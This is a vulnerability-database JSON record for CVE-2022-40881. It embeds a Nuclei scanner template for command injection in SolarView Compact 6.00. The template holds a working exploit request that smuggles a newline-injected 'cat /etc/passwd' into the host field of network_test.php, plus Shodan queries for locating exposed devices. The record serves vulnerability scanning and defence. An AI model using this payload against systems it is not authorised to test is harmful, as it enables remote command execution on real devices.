{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-40881/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-40881/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-40881/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-40881/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-40881/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-40881"},"sightings":{"href":"/api/v1/sightings/cve-2022-40881"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-40881.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-40881\n\ninfo:\n  name: SolarView 6.00 - Remote Command Execution\n  author: For3stCo1d\n  severity: critical\n  description: |\n    SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n  remediation: |\n    Apply the latest patch or upgrade to a non-vulnerable version of SolarView.\n  reference:\n    - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php\n    - https://github.com/advisories/GHSA-wx3r-88rg-whxq\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-40881\n    - https://github.com/KayCHENvip/vulnerability-poc\n    - https://github.com/Threekiii/Awesome-POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-40881\n    cwe-id: CWE-77\n    epss-score: 0.30111\n    epss-percentile: 0.98156\n    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: contec\n    product: solarview_compact\n    shodan-query:\n      - http.favicon.hash:\"-244067125\"\n      - cpe:\"cpe:2.3:h:contec:solarview_compact\"\n  tags: cve,cve2022,solarview,rce,lfi,contec,vkev,vuln\nvariables:\n  cmd: \"cat${IFS}/etc/passwd\"\n\nhttp:\n  - raw:\n      - |\n        POST /network_test.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        host=%0a{{cmd}}%0a&command=ping\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402201a2f97538c1bd08316cc61a5700506a1002f5e461425399d1f91b290d53129e702202ff9ce9a1d64dffa2b519195d549100192bbe88ccb14a5b79fbba62f0ca2c7e0:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2022-40881"}